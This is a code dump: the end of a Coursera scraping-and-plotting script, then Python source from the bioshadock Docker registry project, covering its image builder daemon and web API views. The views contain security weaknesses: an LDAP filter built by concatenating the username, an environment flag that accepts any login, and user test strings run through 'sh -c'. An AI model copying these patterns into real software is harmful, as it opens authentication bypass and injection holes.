product_pages = 4
## Fetch the data ##########################################################
if(run_locally):
print(f"Reading courses from local file courses.json.")
courses_df = pd.read_json('courses.json', orient='records')
print(f"Reading courses from local file specializations.json.")
specs_df = pd.read_json('specializations.json', orient='records')
else:
all_products_list = []
# Loop through each of the pages returned for the all products request
for i in range(0, product_pages + 1):
# Request data from algolia for current page
with urllib.request.urlopen(f'{algolia_url}{i}') as url:
print(f"Fetching coursera program data on page {i}.")
page_data = json.loads(url.read().decode())
# Save page data to local json file.
with open(f'all-products-{i}.json', 'w') as outfile:
json.dump(page_data, outfile)
# Merge all products data into single list.
all_products_list = all_products_list + page_data['hits']
# Wait before scraping next data
time.sleep(wait_length)
# Convert raw products json data into datframe
all_products_df = pd.DataFrame.from_dict(all_products_list)
# Group Courses, and clean data before creating dict
courses_df = all_products_df.loc[all_products_df['entityType'] == 'COURSE'].reset_index(drop=True)
courses_df['id'] = courses_df.apply(lambda row: row['objectID'].replace('course~',''), axis=1)
courses_df = courses_df.set_index('id')
courses = courses_df.to_dict('index')
# Group Specializations, and clean data before creating dict
specs_df = all_products_df.loc[all_products_df['entityType'] == 'SPECIALIZATION'].reset_index(drop=True)
specs_df['id'] = specs_df.apply(lambda row: row['objectID'].replace('s12n~',''), axis=1)
specs_df = specs_df.set_index('id')
specs = specs_df.to_dict('index')
# Loop through all specializations to collect their courses
loop_length = len(specs.keys())
for index, spec_id in enumerate(list(specs.keys())[:loop_length]):
# Get specialization URL
specs[spec_id]['courses'] = []
spec_row = specs[spec_id]
slug = spec_row['objectUrl'].replace("/specializations/", "")
print(f"[{index+1}/{loop_length}] - Fetching course data for \"{slug}\"")
spec_url = f"https://www.coursera.org/api/onDemandSpecializations.v1?q=slug&slug={slug}&fields=courseIds,id"
# Make a request to that URL
with urllib.request.urlopen(spec_url) as url:
# Parse the JSON response.
spec_data = json.loads(url.read().decode())
course_ids = spec_data['elements'][0]['courseIds']
# Loop through each course
for course_id in course_ids:
# Check that we have a record of this course already from Algolia
if course_id not in courses:
print(f" - {course_id} - 404")
else:
# Initialize specs array for course if required.
if 'specializations' not in courses[course_id].keys():
courses[course_id]['specializations'] = []
print(f" - {courses[course_id]['name']}")
# Add Specialization to Course, and vice versa
if spec_id not in courses[course_id]['specializations']:
courses[course_id]['specializations'].append(spec_id)
if course_id not in specs[spec_id]['courses']:
specs[spec_id]['courses'].append(course_id)
# Wait before scraping next data
time.sleep(wait_length)
# Convert back to DF and save to local JSON
specs_df = pd.DataFrame.from_dict(specs, orient='index')
specs_df.to_json('specializations.json')
# Pricing Data for courses
loop_length = len(courses.keys())
for index, course_id in enumerate(list(courses.keys())[:loop_length]):
print(f"[{index+1}/{loop_length}] - Fetching price data for \"{courses[course_id]['name']}\"")
courses[course_id]['price'] = 0
price_url = f"https://www.coursera.org/api/productPrices.v3/VerifiedCertificate~{course_id}~GBP~GB"
try:
with urllib.request.urlopen(price_url) as url:
price_data = json.loads(url.read().decode())
courses[course_id]['price'] = price_data['elements'][0]['amount']
print(f'{courses[course_id]["name"]}: £{courses[course_id]["price"]}')
except:
print(f'{courses[course_id]["name"]}: ERROR - Not found')
# Wait before scraping next data
time.sleep(wait_length)
# Convert back to DF and save to JSON
courses_df = pd.DataFrame.from_dict(courses, orient='index')
courses_df.to_json('courses.json')
## Aggregate metrics ###########################################
# Add some fields for later use
specs_df['partners_str'] = specs_df.apply(lambda x : 'Offered by ' + ' & '.join(x['partners']),axis=1)
specs_df['specialization'] = specs_df['name'] + '\n' + specs_df['partners_str']
courses_df['partners_str'] = courses_df.apply(lambda x : 'Offered by ' + ' & '.join(x['partners']),axis=1)
courses_df['course'] = courses_df['name'] + '\n' + courses_df['partners_str']
# Expand the lists we want to aggregate in the specializations table
specs_df['courses'] = specs_df['courses'].apply(lambda d: d if isinstance(d, list) else [])
specs_with_expanded_courses_df = expand_list(specs_df, 'courses', 'course_id')
specs_with_expanded_partners_df = expand_list(specs_df, 'partners', 'partner_name')
# Join to the courses dataframe for additional metrics and clean columns names.
merged_specs_df = pd.merge(specs_with_expanded_courses_df, courses_df, left_on='course_id', right_index=True)
aggd_specs_df = merged_specs_df.groupby('specialization', as_index=False).sum()[['specialization','avgLearningHours_y','price']]
aggd_specs_df.rename(columns={'avgLearningHours_y': 'avgLearningHours', 'avgLearningHours_y': 'avgLearningHours'}, inplace=True)
## Plot some graphs ############################################
# Init Seaborn style
sns.set(style="whitegrid")
# What are some general stats on all specializations?
fig, axes = plt.subplots(4, 1)
sns.boxplot(x='enrollments', data=specs_df, ax=axes[0])
sns.boxplot(x='avgLearningHours', data=aggd_specs_df, ax=axes[1])
sns.boxplot(x='price', data=aggd_specs_df, ax=axes[2])
sns.boxplot(x='avgProductRating', data=specs_df, ax=axes[3])
# What are the most popular specializations?
top_specs_enrollments = specs_df.nlargest(15,'enrollments')
sns.barplot(x="enrollments", y="specialization", data=top_specs_enrollments)
# What are the most popular courses?
top_courses_enrollments = courses_df.nlargest(15,'enrollments')
sns.barplot(x="enrollments", y="course", data=courses_df)
# Are popular courses generally rated higher? (min number of enrollments)
sns.scatterplot(x="enrollments", y="avgProductRating", data=specs_df)
#courses_df.boxplot()
# Do longer courses have fewer enrollments?
# Scatter
# Do more expensive courses have fewer enrollments?
# Scatter
# Is there an organisation that provides the best courses?
# Does specialization duration have an impact on enrollments or reviews?
# Does price?
# What are the top ten courses by enrollments
``` |
{
"source": "jibe-b/bioshadock",
"score": 2
} |
#### File: jibe-b/bioshadock/builder.py
```python
import sys
import signal
import os
import time
from io import BytesIO
import logging
import logging.config
import requests
import base64
import json
import datetime
import time
from pymongo import MongoClient
from bson import json_util
from bson.json_util import loads
from bson.objectid import ObjectId
import redis
import re
import subprocess
import tempfile
import shutil
import yaml
from daemon import Daemon
from docker import Client
from git.repo.base import Repo
from logentries import LogentriesHandler
from clair.clair import Clair
import copy
from elasticsearch import Elasticsearch
requests.packages.urllib3.disable_warnings()
class BioshadockDaemon(Daemon):
es = None
db_mongo = None
db_redis = None
cli = None
run_once = False
def test(self, build, container_id):
pass
def analyse_with_clair(self, image_id):
self.log.debug('Analyse '+image_id+' with Clair')
cfg = {
'clair.host': self.config['clair']['host'],
'docker.connect': self.config['services']['docker']['connect']
}
clair_analyse = Clair(cfg)
layers = clair_analyse.analyse(image_id)
layer_ids = []
for layer in layers:
layer_ids.append(layer['id'])
return layer_ids
def stats(self):
config_file = "config.yaml"
if "BIOSHADOCK_CONFIG" in os.environ:
config_file = os.environ["BIOSHADOCK_CONFIG"]
self.config= None
with open(config_file, 'r') as ymlfile:
self.config = yaml.load(ymlfile)
BioshadockDaemon.db_redis = redis.StrictRedis(
host=self.config['services']['redis']['host'],
port=self.config['services']['redis']['port'],
db=self.config['services']['redis']['db']
)
queues = BioshadockDaemon.db_redis.hkeys('bioshadock:user:builds')
print("Build usage:")
for queue in queues:
print("\t%s: %s, in queue: %d" % (queue,
BioshadockDaemon.db_redis.hget('bioshadock:user:builds', queue),
BioshadockDaemon.db_redis.llen('bioshadock:builds:' + queue)))
sys.exit(0)
def run(self):
config_file = "config.yaml"
if "BIOSHADOCK_CONFIG" in os.environ:
config_file = os.environ["BIOSHADOCK_CONFIG"]
self.config= None
with open(config_file, 'r') as ymlfile:
self.config = yaml.load(ymlfile)
if self.config['log_config'] is not None:
for handler in list(self.config['log_config']['handlers'].keys()):
self.config['log_config']['handlers'][handler] = dict(self.config['log_config']['handlers'][handler])
logging.config.dictConfig(self.config['log_config'])
log = logging.getLogger('builder')
self.log = log
'''
config = ConfigParser.ConfigParser()
config.readfp(open(config_file))
self.config = config
logging.config.fileConfig(config_file)
log = logging.getLogger(__name__)
self.log = log
if config.has_option('app:main', 'logentries'):
log.addHandler(
LogentriesHandler(config.get('app:main', 'logentries')))
'''
log.warn("Starting a builder")
do_squash = False
if self.config['general']['squash']['use'] == 1:
do_squash = True
queue_counter = 0
while True:
if os.path.exists('/tmp/bioshadocker-builder.stop'):
log.warn('Request to exit: /tmp/bioshadocker-builder.stop')
break
log.debug("New build run")
if BioshadockDaemon.db_mongo is None:
mongo = MongoClient(self.config['services']['mongo']['url'])
BioshadockDaemon.db_mongo = mongo[self.config['services']['mongo']['db']]
if BioshadockDaemon.es is None:
BioshadockDaemon.es = Elasticsearch(self.config['services']['elastic']['host'].split(','))
if BioshadockDaemon.db_redis is None:
BioshadockDaemon.db_redis = redis.StrictRedis(
host=self.config['services']['redis']['host'],
port=self.config['services']['redis']['port'],
db=self.config['services']['redis']['db']
)
if BioshadockDaemon.cli is None:
timeout=1800
if self.config['services']['docker']['timeout']:
timeout = self.config['services']['docker']['timeout']
if self.config['services']['docker']['connect']:
BioshadockDaemon.cli = Client(
base_url=self.config['services']['docker']['connect'],
timeout=timeout
)
else:
BioshadockDaemon.cli = Client(timeout=timeout)
if self.config['registry']['push'] == 0:
log.debug('Local docker, not using registry')
else:
BioshadockDaemon.cli.login(
username=self.config['registry']['auth']['user'],
password=self.config['registry']['auth']['password'],
email=self.config['registry']['auth']['email'],
registry=self.config['registry']['service'])
queues = BioshadockDaemon.db_redis.hkeys('bioshadock:user:builds')
user_id = None
if queue_counter >= len(queues):
log.debug("Queue: go back to beginning")
queue_counter = 0
build = None
while build is None and queue_counter < len(queues):
user_id = queues[queue_counter]
log.debug("Queue:Check:%s" % (user_id))
build = BioshadockDaemon.db_redis.lpop('bioshadock:builds:' + user_id)
queue_counter += 1
dockerfile = None
if build is not None:
log.info("Build queue: %s" % (user_id))
build = loads(build)
log.info('Build request: ' + str(build['id']))
BioshadockDaemon.db_mongo['builds'].update(
{'_id': ObjectId(build['build'])}, {'$set': {'progress': 'building'}})
dt = datetime.datetime.now()
timestamp = time.mktime(dt.timetuple())
# log.debug(str(build))
dockerfile = build['dockerfile']
gitrepo = build['git']
do_git = False
git_repo_dir = None
# CWL
is_cwl = False
cwl_is_url = False
cwl = None
entrypoint = None
description = None
tags = []
size = None
labels = []
layer_ids = []
clair_check = False
if 'cwl_path' in build and build['cwl_path'] and build['cwl_path'] != 'none':
is_cwl = True
build['cwl_path'] = build['cwl_path'].encode('utf-8')
if build['cwl_path'].startswith('http'):
cwl_is_url = True
try:
r = requests.get(build['cwl_path'])
cwl = r.text.encode('utf-8')
except Exception as e:
log.error(
'Could not get CWL: ' + str(build['cwl_path']) + " " + str(e))
git_repo_dir = None
if gitrepo is not None and gitrepo and gitrepo != 'none':
# dockerfile
git_repo_dir = tempfile.mkdtemp(suffix='.git')
do_git = True
git_info = gitrepo.split('#')
gitrepo = git_info[0]
selectedbranch = 'master'
subdir = None
if len(git_info) > 1:
branch_path = git_info[1].split(':')
if branch_path[0]:
selectedbranch = branch_path[0]
if len(branch_path) > 1 and branch_path[1]:
subdir = branch_path[1]
log.debug("Temporary directory: " + str(gitrepo))
log.info("Using branch " + selectedbranch)
log.info("Directory: " + str(subdir))
try:
Repo.clone_from(
gitrepo, git_repo_dir, branch=selectedbranch)
if is_cwl and not cwl_is_url:
if build['cwl_path'].startswith('/'):
build['cwl_path'] = build['cwl_path'][1:]
cwl_file = os.path.join(
git_repo_dir, build['cwl_path'])
if not os.path.exists(cwl_file):
log.error(
'Could not get CWL: ' + str(build['cwl_path']))
else:
with open(cwl_file, "r") as cwlFile:
cwl = cwlFile.read().encode('utf-8')
if subdir is not None:
git_repo_dir = os.path.join(git_repo_dir, subdir)
log.debug(str(git_repo_dir))
os.chdir(git_repo_dir)
except Exception as e:
logging.error('Git error: ' + str(e))
BioshadockDaemon.db_mongo['builds'].update({'_id':
ObjectId(
build[
'build'])},
{'$set': {'progress': 'failed',
'response': [str(e)]
}
})
continue
# if dockerfile:
if not os.path.exists("Dockerfile"):
log.debug("Overwrite Dockerfile")
f = open('Dockerfile', 'w')
f.write(dockerfile.encode('utf-8'))
f.close()
else:
try:
log.debug("Use git Dockerfile")
with open("Dockerfile", "r") as gitDockerfile:
dockerfile = gitDockerfile.read().encode('utf-8')
except Exception as e:
log.error('Failed to decode Docker file: '+str(e))
build['progress'] = 'failed'
build['response'] = ['Failed to decode dockerfile: '+str(e)]
BioshadockDaemon.db_mongo['builds'].update(
{'_id': ObjectId(build['build'])}, build)
continue
f = BytesIO(dockerfile.encode('utf-8'))
build_tag = ''
info_tag = 'latest'
if 'tag' in build and build['tag']:
build_tag = ':' + build['tag']
info_tag = build['tag']
log.warn('Build: ' + str(build['id']) + ':' + str(info_tag))
response = []
container_inspect = None
build_ok = False
try:
orig_build_tag = build_tag
if do_squash:
build_tag = ":squash"
if do_git:
response = [line for line in BioshadockDaemon.cli.build(
path=git_repo_dir, rm=True, tag=self.config['registry']['service'] + "/" + build['id'] + build_tag, nocache=True, timeout=self.config['services']['docker']['timeout'])]
else:
response = [line for line in BioshadockDaemon.cli.build(
fileobj=f, rm=True, tag=self.config['registry']['service'] + "/" + build['id'] + build_tag, nocache=True, timeout=self.config['services']['docker']['timeout'])]
except Exception as e:
log.error('Build error: ' + str(e))
response += [str(e)]
try:
container_inspect = BioshadockDaemon.cli.inspect_image(
self.config['registry']['service'] + "/" + build['id'] + build_tag)
build_ok = True
except Exception as e:
log.error('Inspect error: ' + str(e))
response += [str(e)]
build['response'] = []
for res in response:
try:
json_res = json.loads(res)
build['response'].append(json_res['stream'])
except Exception as e:
log.debug('Failed to decode json from stream output')
build['response'].append(res)
if build['response'] and build_ok:
log.debug(str(response))
last = build['response'][len(build['response']) - 1]
matches = re.search('Successfully built\s+(\w+)', last)
if matches is None:
build['status'] = False
log.info('Build error: ' + str(build['id']))
else:
log.info('Successful build: ' + str(build['id']))
build['status'] = True
build['image_id'] = matches.group(1)
tests = []
if container_inspect is not None:
entrypoint = container_inspect['Config']['Entrypoint']
size = container_inspect['VirtualSize']
log.debug(
str(container_inspect['Config']['Labels']))
for label in list(container_inspect['Config']['Labels'].keys()):
label_elts = container_inspect[
'Config']['Labels'][label]
if label.lower().endswith('description'):
description = label_elts
if label.lower().endswith('tags'):
tags = label_elts.split(',')
if label_elts.startswith('{') or label_elts.startswith('['):
try:
label_elts = json.loads(label_elts)
except Exception as e:
log.debug(
"Failed to decode JSON for " + str(build['id']) + ": " + str(label))
labels.append(
{label.replace('.', '_'): label_elts})
if label == 'bioshadock.tests':
tests = json.loads(
base64.decodestring(label_elts))
if not tests and git_repo_dir and os.path.exists(os.path.join(git_repo_dir, 'test.yaml')):
log.debug('Load test.yaml for ' + build['id'] + 'from git repo')
with open(os.path.join(git_repo_dir, 'test.yaml'), 'r') as ymlfile:
commands = yaml.load(ymlfile)
tests = commands['test']['commands']
if tests:
for test in tests:
test_container = None
try:
build['response'].append(
"Test: " + str(test) + "\n")
log.debug("Execute test for " + self.config['registry']['service'] + "/" + build['id'] + build_tag + ": " + str(test))
if '"' in test:
build['response'].append("Test:Skipping:test contains double quotes:"+test)
log.debug("Test:Skipping:test contains double quotes:"+test)
continue
command='sh -c "'+test+'"'
if git_repo_dir is not None:
host_config = BioshadockDaemon.cli.create_host_config(binds={
git_repo_dir: {
'bind': '/repo',
'mode': 'rw',
}
})
test_container = BioshadockDaemon.cli.create_container(
image=self.config['registry']['service'] + "/" + build['id'] + build_tag, command=command, host_config=host_config, environment=["R=R"])
else:
test_container = BioshadockDaemon.cli.create_container(
image=self.config['registry']['service'] + "/" + build['id'] + build_tag, command=command, environment=["R=R"])
response = BioshadockDaemon.cli.start(
container=test_container.get('Id'))
time.sleep(2)
test_container_inspect = BioshadockDaemon.cli.inspect_container(
test_container.get('Id'))
if test_container_inspect['State']['ExitCode'] != 0:
build['status'] = False
build['response'].append(
"Test result: Failed\n")
else:
build['response'].append(
"Test result: Success\n")
except Exception as e:
log.error("failed to test container " + self.config['registry']['service'] + "/" + build['id'] + build_tag + ': '+str(e))
build['status'] = False
build['response'].append("Test result: Failed\n")
try:
if test_container is not None:
BioshadockDaemon.cli.remove_container(
container=test_container.get('Id'))
except Exception as e:
log.error('Failed to remove test container '+str(test_container.get('Id'))+': '+str(e))
if not build['status']:
break
# p= subprocess.Popen(["docker",
# "push",
# config.get('app:main', 'service')+"/"+build['id']])
# docker save 49b5a7a88d5 | sudo docker-squash -t
# jwilder/whoami:squash | docker load
if do_squash and build['status']:
log.debug("Squash image " + self.config['registry']['service'] + "/" + build['id'] + build_tag)
log.debug("Save image")
(squash_image_handler, squash_image_file) = tempfile.mkstemp(suffix='.squash.tar')
(squashed_image_handler, squashed_image_file) = tempfile.mkstemp(suffix='.squashed.tar')
p = subprocess.Popen(["docker",
"save",
#"-o", "image.tar",
'-o', squash_image_file,
self.config['registry']['service'] + "/" + build[
'id'] + build_tag,
])
p.wait()
log.debug("Squash image")
p = subprocess.Popen(
[self.config['general']['squash']['docker-squash'],
#"-i", "image.tar",
"-i", squash_image_file,
#"-o", "squashed.tar",
"-o", squashed_image_file,
"-t", self.config['registry']['service'] + "/" + build['id'] + orig_build_tag,
])
p.wait()
log.debug("Reload image")
p = subprocess.Popen([
"docker", "load", "-i", squashed_image_file
#"docker", "load", "-i", "squashed.tar"
])
p.wait()
if os.path.exists(squash_image_file):
os.remove(squash_image_file)
if os.path.exists(squashed_image_file):
os.remove(squashed_image_file)
if build['status'] and self.config['clair']['use'] == 1:
log.debug('Analyse with Clair')
clair_check = True
layer_ids = self.analyse_with_clair(self.config['registry']['service'] + "/" + build['id'] + orig_build_tag)
if self.config['registry']['push'] == 0:
log.debug("Skip image push, keep local " + self.config['registry']['service'] + "/" + build['id'] + orig_build_tag)
try:
if do_squash:
log.debug("Remove squash image")
BioshadockDaemon.cli.remove_image(
self.config['registry']['service'] + "/" + build['id'] + ":squash")
except Exception as e:
log.error(
"Failed to remove image " + build['id'] + " " + str(e))
else:
if build['status']:
log.warn("Push image " + self.config['registry']['service'] + "/" + build['id'] + orig_build_tag)
try:
response = [line for line in BioshadockDaemon.cli.push(
self.config['registry']['service'] + "/" + build['id'] + orig_build_tag, stream=True)]
except Exception as e:
log.error(
"Failed to push image: " + build['id'] + " " + str(e))
build['status'] = False
build['response'].append(
"Failed to push to registry")
try:
log.debug("Remove images for " + self.config['registry']['service'] + "/" + build['id'])
if do_squash:
log.debug("Remove squash image")
BioshadockDaemon.cli.remove_image(
self.config['registry']['service'] + "/" + build['id'] + ":squash")
BioshadockDaemon.cli.remove_image(
self.config['registry']['service'] + "/" + build['id'] + orig_build_tag)
except Exception as e:
log.error(
"Failed to remove image " + build['id'] + " " + str(e))
else:
build['status'] = False
if is_cwl and cwl is None:
build['response'].append("Failed to get CWL")
build['timestamp'] = timestamp
build['progress'] = 'over'
if not build['status']:
build['progress'] = 'failed'
build['tag'] = info_tag
meta_info = {'meta.Dockerfile': dockerfile,
'meta.cwl': cwl,
'meta.Entrypoint': entrypoint,
'meta.Dockerlabels': labels,
'meta.layers': layer_ids,
'meta.version.'+info_tag.replace('.','_')+'.layers': layer_ids,
'meta.clair': clair_check
}
if tags:
meta_info['meta.tags'] = tags
log.debug(
"Update repository " + build['id'] + ": " + str(meta_info))
if description is not None:
meta_info['meta.docker_description'] = description
if size is not None:
meta_info['meta.docker_tags.' + info_tag.replace('.','_')] = {
'size': int(size), 'last_updated': timestamp, 'tag': info_tag}
if build['status']:
meta_info['meta.last_updated'] = timestamp
meta_info['meta.built'] = True
BioshadockDaemon.db_mongo['builds'].update(
{'_id': ObjectId(build['build'])}, build)
BioshadockDaemon.db_mongo[
'repository'].update({'id': build['id']},
{'$set': meta_info})
# Record specific tag info
if build['status']:
BioshadockDaemon.db_mongo['versions'].update(
{'repo': build['id'], 'version': info_tag},
{
'repo': build['id'],
'version': info_tag,
'dockerfile': dockerfile,
'cwl': cwl
},
upsert=True
)
log.debug('Update indexation')
updated_container = BioshadockDaemon.db_mongo['repository'].find_one({'id': build['id']})
es_repo = copy.deepcopy(updated_container)
del es_repo['_id']
del es_repo['builds']
del es_repo['meta']
es_repo['meta'] = {'description': updated_container['meta']['description'],
'short_description': updated_container['meta']['short_description'],
'tags': updated_container['meta']['tags']
}
BioshadockDaemon.es.index(index="bioshadock", doc_type='container', id=build['id'], body=es_repo)
if do_git:
cur_dir = os.path.dirname(os.path.realpath(__file__))
os.chdir(cur_dir)
log.debug(
"Cleaning directory " + cur_dir + " => " + git_repo_dir)
shutil.rmtree(git_repo_dir)
if self.run_once:
break
time.sleep(2)
if __name__ == "__main__":
pid_file = "/tmp/bioshadockbuilder.pid"
if "BIOSHADOCK_PID" in os.environ:
pid_file = os.environ["BIOSHADOCK_PID"]
daemon = BioshadockDaemon(pid_file)
if len(sys.argv) == 2:
if 'start' == sys.argv[1]:
daemon.start()
elif 'stop' == sys.argv[1]:
daemon.stop()
elif 'restart' == sys.argv[1]:
daemon.restart()
elif 'run' == sys.argv[1]:
daemon.run()
elif 'once' == sys.argv[1]:
daemon.run_once = True
daemon.run()
elif 'stats' == sys.argv[1]:
daemon.stats()
else:
print "Unknown command"
sys.exit(2)
sys.exit(0)
else:
print "usage: %s start|stop|restart|run|once|stats" % sys.argv[0]
sys.exit(2)
```
#### File: bioshadock/shadock/views.py
```python
from pyramid.view import view_config
from pyramid.response import Response
from pyramid.httpexceptions import HTTPFound, HTTPNotFound, HTTPForbidden, HTTPUnauthorized, HTTPBadRequest
import json
import datetime
import time
import base64
import struct
import re
import urllib3
import copy
import logging
import string
import random
import tempfile
import os
import subprocess
import bcrypt
import smtplib
from email.mime.text import MIMEText
from bson import json_util
from bson.json_util import dumps
from bson.objectid import ObjectId
from bson.errors import InvalidId
import jwt
from cryptography.hazmat.backends import default_backend
from cryptography.x509 import load_pem_x509_certificate
from cryptography.hazmat.primitives.serialization import (
load_pem_private_key, load_pem_public_key, load_ssh_public_key
)
from cryptography.hazmat.primitives import serialization
from basicauth import decode
import pymongo
from ldap3 import Server, Connection, AUTH_SIMPLE, STRATEGY_SYNC, STRATEGY_ASYNC_THREADED, SEARCH_SCOPE_WHOLE_SUBTREE, GET_ALL_INFO
from bioshadock_biotools.parser import Parser
from bioshadock_biotools.biotools import BioTools
from clair.clair import Clair
def notify_new_container_email(request, repo):
if not request.registry.config['general']['mail']['smtp_host'] or not request.registry.config['general']['mail']['to']:
logging.debug('No smtp or to email configuration, skipping mail notification')
return
to = request.registry.config['general']['mail']['to']
subject = 'New container created: ' + str(repo['id'])
message = 'New container: ' + str(repo['id'])
msg = MIMEText(message)
msg['Subject'] = subject
msg['From'] = request.registry.config['general']['mail']['from']
msg['To'] = request.registry.config['general']['mail']['to']
try:
s = smtplib.SMTP(request.registry.config['general']['mail']['smtp_host'], request.registry.config['general']['mail']['smtp_port'])
if request.registry.config['general']['mail']['tls']:
s.starttls()
if request.registry.config['general']['mail']['smtp_user']:
s.login(request.registry.config['general']['mail']['smtp_user'], request.registry.config['general']['mail']['smtp_password'])
s.sendmail(msg['From'], [msg['To']], msg.as_string())
s.quit()
except Exception as e:
logging.error('Email error: ' + str(e))
def build_container(request, build):
request.registry.db_redis.hincrby('bioshadock:user:builds', build['user'], 1)
request.registry.db_redis.rpush('bioshadock:builds:' + build['user'], dumps(build))
def is_admin(username, request):
user = request.registry.db_mongo['users'].find_one({'id': username})
if user is None:
return False
if user['role'] == 'admin':
return True
return False
def can_push_to_library(username, request):
user = request.registry.db_mongo['users'].find_one({'id': username})
if user is None:
return False
if user['role'] == 'admin' or user['role'] == 'editor':
return True
return False
def valid_user(username, password, request):
if 'BIOSHADOCK_AUTH' in os.environ and os.environ['BIOSHADOCK_AUTH'] == 'fake':
return True
user = request.registry.db_mongo['users'].find_one({'id': username})
if user is None or 'password' not in user:
# If user logged via social, no password available, use apikey for authentication on API
if user is not None and 'type' in user and user['type'] == 'social':
if user['apikey'] and user['apikey'] == password:
return True
ldap_dn = request.registry.config['ldap']['dn']
base_dn = 'ou=People,' + ldap_dn
ldapfilter = "(&(|(uid=" + username + ")(mail=" + username + ")))"
try:
attrs = ['uid', 'mail']
con = Connection(request.registry.ldap_server, auto_bind=True, client_strategy=STRATEGY_SYNC, check_names=True)
con.search(base_dn, ldapfilter, SEARCH_SCOPE_WHOLE_SUBTREE, attributes=attrs)
if con.response:
user_dn= None
user_id = None
for r in con.response:
user_dn = str(r['dn'])
user_id = r['attributes']['uid']
con.unbind()
con = Connection(request.registry.ldap_server, auto_bind=True, read_only=True, client_strategy=STRATEGY_SYNC, user=user_dn, password=password, authentication=AUTH_SIMPLE, check_names=True)
con.unbind()
else:
con.unbind()
return False
if user_dn is not None and user is None:
role = 'contributor'
if username in request.registry.admin:
role = 'admin'
apikey = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(20))
request.registry.db_mongo['users'].insert({'id': username,
'role': role,
'apikey': apikey,
'type': 'ldap'})
except Exception as e:
logging.error(str(e))
return False
else:
print "local user"
if bcrypt.hashpw(password.encode('utf-8'), user['password'].encode('utf-8')) == user['password']:
return True
else:
return False
return True
def is_logged(request):
'''
Check if user is logged, return user info or None
'''
if request.authorization is not None:
try:
(type, bearer) = request.authorization
secret = request.registry.config['registry']['secret_passphrase']
# If decode ok and not expired
user = jwt.decode(bearer, secret, audience='urn:bioshadock/auth')
return user['user']
except Exception:
return None
return None
@view_config(route_name='users', renderer='json', request_method='GET')
def users(request):
session_user = is_logged(request)
if session_user is None:
return HTTPForbidden('User not logged')
users = request.registry.db_mongo['users'].find({})
res = []
for user in users:
res.append(user)
return res
@view_config(route_name='user', renderer='json', request_method='POST')
def user(request):
session_user = is_logged(request)
if session_user is None:
return HTTPForbidden('User not logged')
user = request.registry.db_mongo['users'].find_one({'id': request.matchdict['id']})
if user is None:
return HTTPNotFound()
if not is_admin(session_user['id'], request):
return HTTPForbidden()
if session_user['id'] == user['id']:
return HTTPForbidden()
form = json.loads(request.body, encoding=request.charset)
user['role'] = form['role']
request.registry.db_mongo['users'].update({'id': user['id']},{'$set': {'role': user['role']}})
return user
@view_config(route_name='config', renderer='json', request_method='GET')
def config(request):
config = {
'registry': request.registry.config['registry']['docker'],
'service': request.registry.config['registry']['service'],
'issuer': request.registry.config['registry']['issuer']
}
return config
@view_config(route_name='user_is_logged', renderer='json', request_method='GET')
def user_is_logged(request):
user = is_logged(request)
if user is None:
return HTTPNotFound('User not logged')
else:
return user
@view_config(route_name='user_bind', renderer='json', request_method='POST')
def user_bind(request):
form = json.loads(request.body, encoding=request.charset)
uid = form['uid']
password = form['password']
token = None
if form and 'token' in form:
token = form['token']
if token:
secret = request.registry.config['registry']['secret_passphrase']
user = jwt.decode(token, secret, audience='urn:bioshadock/auth')
uid = user['user']['id']
user = request.registry.db_mongo['users'].find_one({'id': uid})
if user is not None and 'type' in user and user['type'] == 'ldap':
return HTTPUnauthorized('Trying to connect with the id of an existing user')
if user is None:
role = 'visitor'
apikey = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(20))
request.registry.db_mongo['users'].insert({'id': uid,
'role': role,
'apikey': apikey,
'type': 'social'})
else:
if not valid_user(uid, password, request):
return HTTPUnauthorized('Invalid credentials')
user = request.registry.db_mongo['users'].find_one({'id': uid})
if not user:
return HTTPUnauthorized('Invalid credentials')
secret = request.registry.config['registry']['secret_passphrase']
del user['_id']
token = jwt.encode({'user': user,
'exp': datetime.datetime.utcnow() + datetime.timedelta(seconds=3600),
'aud': 'urn:bioshadock/auth'}, secret)
return { 'user': user, 'token': token }
@view_config(route_name='search', renderer='json', request_method='GET')
def search_es(request):
q = request.params['q']
user = is_logged(request)
conditions = []
key = "_all"
value = q
if ":" in q:
elts = q.split(":")
key = 'meta.' + elts[0]
value = elts[1]
query = [ {"term": {key: value}}]
if user is None:
query.append({"term": {"visible": True}})
else:
conditions.append({"term": {"visible": True}})
conditions.append({"term": {"user": user['id']}})
conditions.append({"term": {"acl_push.members": user['id']}})
conditions.append({"term": {"acl_pull.members": user['id']}})
res = request.registry.es.search(
index = "bioshadock",
search_type = 'query_then_fetch',
size = 1000,
body = {
"query" : { "filtered" : { "filter" : { "bool" :
{"must": query, "should": conditions},
} } },
})
return res
@view_config(route_name='containers_latest', renderer='json', request_method='GET')
def containers_latest(request):
repos = request.registry.db_mongo['repository'].find({'library': True},{'id': 1, 'description': 1}, sort=[('_id', pymongo.DESCENDING)], limit=20)
library_containers = []
for container in repos:
library_containers.append(container)
return library_containers
@view_config(route_name='containers_all', renderer='json', request_method='GET')
def containers_all(request):
light = False
if 'light' in request.params:
light = True
user = is_logged(request)
if user is None or not is_admin(user['id'], request):
#return HTTPForbidden()
repos = request.registry.db_mongo['repository'].find({'visible': True})
else:
repos = request.registry.db_mongo['repository'].find()
user_repos = []
for repo in repos:
if 'builds' in repo:
del repo['builds']
if 'Dockerfile' in repo['meta'] and repo['meta']['Dockerfile']:
repo['meta']['Dockerfile'] = True
else:
repo['meta']['Dockerfile'] = False
if light:
if 'built' not in repo['meta']:
repo['meta']['built'] = False
if 'short_description' not in repo['meta']:
repo['meta']['short_description'] = repo['meta']['description']
if 'git' not in repo['meta']:
repo['meta']['git'] = None
user_repos.append({
'id': repo['id'],
'meta': {
'short_description': repo['meta']['short_description'],
'built': repo['meta']['built'],
'git': repo['meta']['git'],
'Dockerfile': repo['meta']['Dockerfile']
},
'user': repo['user'],
'visible': repo['visible']
})
else:
user_repos.append(repo)
return user_repos
@view_config(route_name='builds', renderer='json', request_method='GET')
def builds(request):
'''
Get all builds for container, remove response log to limit size
'''
user = is_logged(request)
if user is None:
return HTTPForbidden()
repo_id = '/'.join(request.matchdict['id'])
repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if repo is None:
return HTTPNotFound()
if not repo['visible']:
if user is None:
return HTTPForbidden()
if not is_admin(user['id'], request) and repo['user'] != user['id'] and user['id'] not in repo['acl_pull']['members']:
return HTTPForbidden()
builds = request.registry.db_mongo['builds'].find({'id': repo_id}, {'response': 0})
res = []
for build in builds:
res.append(build)
return res
